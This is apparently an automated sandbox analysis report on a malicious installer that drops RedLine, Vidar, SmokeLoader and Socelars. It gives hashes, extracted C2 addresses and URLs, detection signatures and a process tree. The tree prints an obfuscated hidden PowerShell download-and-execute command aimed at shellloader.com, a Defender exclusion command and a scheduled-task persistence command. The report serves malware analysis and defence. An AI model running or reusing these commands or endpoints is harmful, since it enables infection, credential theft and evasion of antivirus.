Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Analysis
-
max time kernel
11s -
max time network
104s -
platform
windows10_x64 -
resource
win10-jp -
submitted
16-09-2021 20:34
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210916
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210916
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10-jp
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-fr
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-en
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-de
General
-
Target
setup_x86_x64_install.exe
-
Size
7.1MB
-
MD5
7b15ff87e11bd9bc7512b41635b68aeb
-
SHA1
3ddf56275a2132a384d251247f38cc086b6db914
-
SHA256
f92cfeb06515f18113a950d5bd569a23cdd85514ef509ccff6c5a4e9a08ca4c7
-
SHA512
d16b63a203a3322ec70f99a7ca692770c45710e2c0d50f24bf027d8d41d579d721e8cf5f20cc95436b1640b821b8efe1a3c617232cdc18c13be0e37431f7baab
Malware Config
Extracted
http://shellloader.com/welcome
Extracted
vidar
40.6
706
https://dimonbk83.tumblr.com/
-
profile_id
706
Extracted
redline
ANI
45.142.215.47:27643
Extracted
redline
medianew
91.121.67.60:62102
Extracted
smokeloader
2020
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5744 3348 rundll32.exe 21 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 5 IoCs
resource yara_rule behavioral5/memory/4472-318-0x000000000041C5CA-mapping.dmp family_redline behavioral5/memory/4472-316-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral5/memory/4116-336-0x000000000041C5D6-mapping.dmp family_redline behavioral5/memory/4116-333-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral5/memory/4476-382-0x000000000041C5E2-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral5/files/0x000600000001ab49-142.dat family_socelars behavioral5/files/0x000600000001ab49-172.dat family_socelars -
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Win32/Tnega Activity (GET)
suricata: ET MALWARE Win32/Tnega Activity (GET)
-
Vidar Stealer 2 IoCs
resource yara_rule behavioral5/memory/1248-280-0x0000000000A00000-0x0000000000AD4000-memory.dmp family_vidar behavioral5/memory/1248-282-0x0000000000400000-0x00000000004D7000-memory.dmp family_vidar -
resource yara_rule behavioral5/files/0x000400000001ab2c-123.dat aspack_v212_v242 behavioral5/files/0x000400000001ab2c-125.dat aspack_v212_v242 behavioral5/files/0x000400000001ab2b-124.dat aspack_v212_v242 behavioral5/files/0x000400000001ab2b-128.dat aspack_v212_v242 behavioral5/files/0x000400000001ab2b-129.dat aspack_v212_v242 behavioral5/files/0x000400000001ab2e-127.dat aspack_v212_v242 behavioral5/files/0x000400000001ab2e-132.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 9 IoCs
pid Process 3892 setup_installer.exe 4060 setup_install.exe 3208 Thu115049bf2e.exe 2564 Thu117e9466431bbb9f.exe 4228 Thu11b9fee5fd5b3c.exe 3952 Thu118764660749a3b.exe 1896 LivelyScreenRecMa14.exe 4732 Thu116d4ab7efb7.exe 4780 Thu112e5981b78.exe -
resource yara_rule behavioral5/files/0x000600000001ab35-146.dat vmprotect behavioral5/memory/4732-205-0x0000000140000000-0x0000000140650000-memory.dmp vmprotect behavioral5/files/0x000600000001ab35-181.dat vmprotect -
Loads dropped DLL 7 IoCs
pid Process 4060 setup_install.exe 4060 setup_install.exe 4060 setup_install.exe 4060 setup_install.exe 4060 setup_install.exe 4060 setup_install.exe 4060 setup_install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 24 ipinfo.io 110 ipinfo.io 111 ipinfo.io 14 ip-api.com 21 ipinfo.io -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 21 IoCs
pid pid_target Process procid_target 3156 4540 WerFault.exe 125 4268 2564 WerFault.exe 107 5948 2564 WerFault.exe 107 6136 3996 WerFault.exe 123 5396 2564 WerFault.exe 107 5788 3996 WerFault.exe 123 6040 2564 WerFault.exe 107 5232 4540 WerFault.exe 125 2284 3996 WerFault.exe 123 5596 4540 WerFault.exe 125 5692 5868 WerFault.exe 157 5092 3996 WerFault.exe 123 5748 3996 WerFault.exe 123 5840 4540 WerFault.exe 125 1012 4540 WerFault.exe 125 5460 3996 WerFault.exe 123 1036 2564 WerFault.exe 107 6080 3312 WerFault.exe 133 424 3996 WerFault.exe 123 6604 2564 WerFault.exe 107 6980 2564 WerFault.exe 107 -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6520 schtasks.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 22 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious use of AdjustPrivilegeToken 34 IoCs
description pid Process Token: SeCreateTokenPrivilege 3952 Thu118764660749a3b.exe Token: SeAssignPrimaryTokenPrivilege 3952 Thu118764660749a3b.exe Token: SeLockMemoryPrivilege 3952 Thu118764660749a3b.exe Token: SeIncreaseQuotaPrivilege 3952 Thu118764660749a3b.exe Token: SeMachineAccountPrivilege 3952 Thu118764660749a3b.exe Token: SeTcbPrivilege 3952 Thu118764660749a3b.exe Token: SeSecurityPrivilege 3952 Thu118764660749a3b.exe Token: SeTakeOwnershipPrivilege 3952 Thu118764660749a3b.exe Token: SeLoadDriverPrivilege 3952 Thu118764660749a3b.exe Token: SeSystemProfilePrivilege 3952 Thu118764660749a3b.exe Token: SeSystemtimePrivilege 3952 Thu118764660749a3b.exe Token: SeProfSingleProcessPrivilege 3952 Thu118764660749a3b.exe Token: SeIncBasePriorityPrivilege 3952 Thu118764660749a3b.exe Token: SeCreatePagefilePrivilege 3952 Thu118764660749a3b.exe Token: SeCreatePermanentPrivilege 3952 Thu118764660749a3b.exe Token: SeBackupPrivilege 3952 Thu118764660749a3b.exe Token: SeRestorePrivilege 3952 Thu118764660749a3b.exe Token: SeShutdownPrivilege 3952 Thu118764660749a3b.exe Token: SeDebugPrivilege 3952 Thu118764660749a3b.exe Token: SeAuditPrivilege 3952 Thu118764660749a3b.exe Token: SeSystemEnvironmentPrivilege 3952 Thu118764660749a3b.exe Token: SeChangeNotifyPrivilege 3952 Thu118764660749a3b.exe Token: SeRemoteShutdownPrivilege 3952 Thu118764660749a3b.exe Token: SeUndockPrivilege 3952 Thu118764660749a3b.exe Token: SeSyncAgentPrivilege 3952 Thu118764660749a3b.exe Token: SeEnableDelegationPrivilege 3952 Thu118764660749a3b.exe Token: SeManageVolumePrivilege 3952 Thu118764660749a3b.exe Token: SeImpersonatePrivilege 3952 Thu118764660749a3b.exe Token: SeCreateGlobalPrivilege 3952 Thu118764660749a3b.exe Token: 31 3952 Thu118764660749a3b.exe Token: 32 3952 Thu118764660749a3b.exe Token: 33 3952 Thu118764660749a3b.exe Token: 34 3952 Thu118764660749a3b.exe Token: 35 3952 Thu118764660749a3b.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3784 wrote to memory of 3892 3784 setup_x86_x64_install.exe 76 PID 3784 wrote to memory of 3892 3784 setup_x86_x64_install.exe 76 PID 3784 wrote to memory of 3892 3784 setup_x86_x64_install.exe 76 PID 3892 wrote to memory of 4060 3892 setup_installer.exe 77 PID 3892 wrote to memory of 4060 3892 setup_installer.exe 77 PID 3892 wrote to memory of 4060 3892 setup_installer.exe 77 PID 4060 wrote to memory of 4496 4060 setup_install.exe 113 PID 4060 wrote to memory of 4496 4060 setup_install.exe 113 PID 4060 wrote to memory of 4496 4060 setup_install.exe 113 PID 4060 wrote to memory of 3048 4060 setup_install.exe 112 PID 4060 wrote to memory of 3048 4060 setup_install.exe 112 PID 4060 wrote to memory of 3048 4060 setup_install.exe 112 PID 4060 wrote to memory of 752 4060 setup_install.exe 80 PID 4060 wrote to memory of 752 4060 setup_install.exe 80 PID 4060 wrote to memory of 752 4060 setup_install.exe 80 PID 4060 wrote to memory of 4512 4060 setup_install.exe 81 PID 4060 wrote to memory of 4512 4060 setup_install.exe 81 PID 4060 wrote to memory of 4512 4060 setup_install.exe 81 PID 4060 wrote to memory of 4532 4060 setup_install.exe 82 PID 4060 wrote to memory of 4532 4060 setup_install.exe 82 PID 4060 wrote to memory of 4532 4060 setup_install.exe 82 PID 4060 wrote to memory of 4552 4060 setup_install.exe 83 PID 4060 wrote to memory of 4552 4060 setup_install.exe 83 PID 4060 wrote to memory of 4552 4060 setup_install.exe 83 PID 4060 wrote to memory of 4428 4060 setup_install.exe 84 PID 4060 wrote to memory of 4428 4060 setup_install.exe 84 PID 4060 wrote to memory of 4428 4060 setup_install.exe 84 PID 4060 wrote to memory of 4440 4060 setup_install.exe 85 PID 4060 wrote to memory of 4440 4060 setup_install.exe 85 PID 4060 wrote to memory of 4440 4060 setup_install.exe 85 PID 4060 wrote to memory of 3192 4060 setup_install.exe 111 PID 4060 wrote to memory of 3192 4060 setup_install.exe 111 PID 4060 wrote to memory of 3192 4060 setup_install.exe 111 PID 3048 wrote to memory of 3208 3048 cmd.exe 86 PID 3048 wrote to memory of 3208 3048 cmd.exe 86 PID 4060 wrote to memory of 3656 4060 setup_install.exe 110 PID 4060 wrote to memory of 3656 4060 setup_install.exe 110 PID 4060 wrote to memory of 3656 4060 setup_install.exe 110 PID 4496 wrote to memory of 3760 4496 cmd.exe 109 PID 4496 wrote to memory of 3760 4496 cmd.exe 109 PID 4496 wrote to memory of 3760 4496 cmd.exe 109 PID 4060 wrote to memory of 3220 4060 setup_install.exe 108 PID 4060 wrote to memory of 3220 4060 setup_install.exe 108 PID 4060 wrote to memory of 3220 4060 setup_install.exe 108 PID 4532 wrote to memory of 2564 4532 cmd.exe 107 PID 4532 wrote to memory of 2564 4532 cmd.exe 107 PID 4532 wrote to memory of 2564 4532 cmd.exe 107 PID 752 wrote to memory of 4228 752 cmd.exe 106 PID 752 wrote to memory of 4228 752 cmd.exe 106 PID 752 wrote to memory of 4228 752 cmd.exe 106 PID 4512 wrote to memory of 3952 4512 cmd.exe 87 PID 4512 wrote to memory of 3952 4512 cmd.exe 87 PID 4512 wrote to memory of 3952 4512 cmd.exe 87 PID 4060 wrote to memory of 1460 4060 setup_install.exe 88 PID 4060 wrote to memory of 1460 4060 setup_install.exe 88 PID 4060 wrote to memory of 1460 4060 setup_install.exe 88 PID 4428 wrote to memory of 1896 4428 cmd.exe 131 PID 4428 wrote to memory of 1896 4428 cmd.exe 131 PID 4428 wrote to memory of 1896 4428 cmd.exe 131 PID 4060 wrote to memory of 4036 4060 setup_install.exe 104 PID 4060 wrote to memory of 4036 4060 setup_install.exe 104 PID 4060 wrote to memory of 4036 4060 setup_install.exe 104 PID 4552 wrote to memory of 4732 4552 cmd.exe 103 PID 4552 wrote to memory of 4732 4552 cmd.exe 103
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3784 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3892 -
C:\Users\Admin\AppData\Local\Temp\7zS43F6AB61\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS43F6AB61\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4060 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu11b9fee5fd5b3c.exe4⤵
- Suspicious use of WriteProcessMemory
PID:752 -
C:\Users\Admin\AppData\Local\Temp\7zS43F6AB61\Thu11b9fee5fd5b3c.exeThu11b9fee5fd5b3c.exe5⤵
- Executes dropped EXE
PID:4228
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu118764660749a3b.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4512 -
C:\Users\Admin\AppData\Local\Temp\7zS43F6AB61\Thu118764660749a3b.exeThu118764660749a3b.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3952 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:6828
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu117e9466431bbb9f.exe /mixone4⤵
- Suspicious use of WriteProcessMemory
PID:4532 -
C:\Users\Admin\AppData\Local\Temp\7zS43F6AB61\Thu117e9466431bbb9f.exeThu117e9466431bbb9f.exe /mixone5⤵
- Executes dropped EXE
PID:2564 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 6566⤵
- Program crash
PID:4268
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 6726⤵
- Program crash
PID:5948
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 6326⤵
- Program crash
PID:5396
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 6606⤵
- Program crash
PID:6040
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 8886⤵
- Program crash
PID:1036
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 9726⤵
- Program crash
PID:6604
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 11006⤵
- Program crash
PID:6980
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu116d4ab7efb7.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4552 -
C:\Users\Admin\AppData\Local\Temp\7zS43F6AB61\Thu116d4ab7efb7.exeThu116d4ab7efb7.exe5⤵
- Executes dropped EXE
PID:4732
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu11787d2b833e6.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4428 -
C:\Users\Admin\AppData\Local\Temp\7zS43F6AB61\Thu11787d2b833e6.exeThu11787d2b833e6.exe5⤵PID:1896
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu113e650b5e.exe4⤵PID:4440
-
C:\Users\Admin\AppData\Local\Temp\7zS43F6AB61\Thu113e650b5e.exeThu113e650b5e.exe5⤵PID:4808
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1171b1ca5023f5d2.exe4⤵PID:1460
-
C:\Users\Admin\AppData\Local\Temp\7zS43F6AB61\Thu1171b1ca5023f5d2.exeThu1171b1ca5023f5d2.exe5⤵PID:524
-
C:\Users\Admin\AppData\Local\Temp\tmp501E_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp501E_tmp.exe"6⤵PID:4936
-
C:\Users\Admin\AppData\Local\Temp\tmp501E_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmp501E_tmp.exe7⤵PID:4476
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1189012621353ba47.exe4⤵PID:4852
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu118c8b4c3885d897d.exe4⤵PID:4748
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu11f1187a97f50d9c.exe4⤵PID:4036
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1170fdf4c09b1.exe4⤵PID:3220
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1160e2804caf.exe4⤵PID:3656
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu112e5981b78.exe4⤵PID:3192
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu115049bf2e.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3048
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:4496
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS43F6AB61\Thu115049bf2e.exeThu115049bf2e.exe1⤵
- Executes dropped EXE
PID:3208 -
C:\Users\Admin\AppData\Roaming\6392448.scr"C:\Users\Admin\AppData\Roaming\6392448.scr" /S2⤵PID:3780
-
-
C:\Users\Admin\AppData\Roaming\1986945.scr"C:\Users\Admin\AppData\Roaming\1986945.scr" /S2⤵PID:600
-
-
C:\Users\Admin\AppData\Roaming\3932392.scr"C:\Users\Admin\AppData\Roaming\3932392.scr" /S2⤵PID:3312
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3312 -s 17483⤵
- Program crash
PID:6080
-
-
-
C:\Users\Admin\AppData\Roaming\2187882.scr"C:\Users\Admin\AppData\Roaming\2187882.scr" /S2⤵PID:5276
-
-
C:\Users\Admin\AppData\Local\Temp\7zS43F6AB61\Thu1170fdf4c09b1.exeThu1170fdf4c09b1.exe1⤵PID:4840
-
C:\Users\Admin\AppData\Local\Temp\7zS43F6AB61\Thu1170fdf4c09b1.exeC:\Users\Admin\AppData\Local\Temp\7zS43F6AB61\Thu1170fdf4c09b1.exe2⤵PID:2512
-
-
C:\Users\Admin\AppData\Local\Temp\7zS43F6AB61\Thu1170fdf4c09b1.exeC:\Users\Admin\AppData\Local\Temp\7zS43F6AB61\Thu1170fdf4c09b1.exe2⤵PID:4472
-
-
C:\Users\Admin\AppData\Local\Temp\7zS43F6AB61\Thu1160e2804caf.exeThu1160e2804caf.exe1⤵PID:664
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"2⤵PID:4676
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"3⤵PID:2084
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit4⤵PID:6732
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'5⤵
- Creates scheduled task(s)
PID:6520
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"4⤵PID:6476
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"3⤵PID:4704
-
C:\ProgramData\8847264.exe"C:\ProgramData\8847264.exe"4⤵PID:5472
-
-
C:\ProgramData\7149467.exe"C:\ProgramData\7149467.exe"4⤵PID:5868
-
C:\ProgramData\7149467.exe"C:\ProgramData\7149467.exe"5⤵PID:5588
-
-
C:\ProgramData\7149467.exe"C:\ProgramData\7149467.exe"5⤵PID:5860
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5868 -s 11565⤵
- Program crash
PID:5692
-
-
-
C:\ProgramData\5266778.exe"C:\ProgramData\5266778.exe"4⤵PID:5888
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"3⤵PID:5024
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"4⤵PID:5208
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\new\FoxyIDM82\zelda3847.bat" "5⤵PID:5412
-
C:\Users\Admin\AppData\Roaming\new\FoxyIDM82\inst.exeinst.exe6⤵PID:6768
-
C:\Users\Admin\AppData\Roaming\new\FoxyIDM82\inst.exeinst.exe7⤵PID:6960
-
C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"8⤵PID:6140
-
C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"9⤵PID:6540
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\new\FoxyIDM82\FoxyIDM82.exeFoxyIDM82.exe6⤵PID:7024
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"3⤵PID:3996
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3996 -s 8084⤵
- Program crash
PID:6136
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3996 -s 8404⤵
- Program crash
PID:5788
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3996 -s 8724⤵
- Program crash
PID:2284
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3996 -s 9644⤵
- Program crash
PID:5092
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3996 -s 10204⤵
- Program crash
PID:5748
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3996 -s 9764⤵
- Program crash
PID:5460
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3996 -s 10284⤵
- Program crash
PID:424
-
-
-
C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_v4.exe"C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_v4.exe"3⤵PID:4540
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 2604⤵
- Program crash
PID:3156
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 4804⤵
- Program crash
PID:5232
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 4844⤵
- Program crash
PID:5596
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 5044⤵
- Program crash
PID:5840
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 5364⤵
- Program crash
PID:1012
-
-
-
C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecMa14.exe"C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecMa14.exe"3⤵
- Executes dropped EXE
PID:1896 -
C:\Users\Admin\AppData\Local\Temp\tmp7886_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp7886_tmp.exe"4⤵PID:2848
-
C:\Users\Admin\AppData\Local\Temp\tmp7886_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmp7886_tmp.exe5⤵PID:2284
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"3⤵PID:5212
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"4⤵PID:4484
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\new\FoxyIDM82\zelda3847.bat" "5⤵PID:2732
-
C:\Users\Admin\AppData\Roaming\new\FoxyIDM82\inst.exeinst.exe6⤵PID:6780
-
C:\Users\Admin\AppData\Roaming\new\FoxyIDM82\inst.exeinst.exe7⤵PID:6908
-
C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"8⤵PID:3992
-
C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"9⤵PID:2456
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\new\FoxyIDM82\FoxyIDM82.exeFoxyIDM82.exe6⤵PID:7032
-
C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp"C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp" -d "C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\"7⤵PID:4744
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"3⤵PID:5464
-
C:\Users\Admin\AppData\Local\Temp\is-FS57M.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-FS57M.tmp\setup_2.tmp" /SL5="$103C4,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"4⤵PID:5592
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT5⤵PID:6076
-
C:\Users\Admin\AppData\Local\Temp\is-DD27V.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-DD27V.tmp\setup_2.tmp" /SL5="$203FE,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT6⤵PID:5268
-
C:\Users\Admin\AppData\Local\Temp\is-K1I20.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-K1I20.tmp\postback.exe" ss17⤵PID:1592
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe ss18⤵PID:3220
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"9⤵PID:6784
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"10⤵PID:2432
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"3⤵PID:5528
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a4⤵PID:5432
-
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"3⤵PID:5776
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"3⤵PID:5640
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS43F6AB61\Thu1189012621353ba47.exeThu1189012621353ba47.exe1⤵PID:1248
-
C:\Users\Admin\AppData\Local\Temp\7zS43F6AB61\Thu11f1187a97f50d9c.exeThu11f1187a97f50d9c.exe1⤵PID:636
-
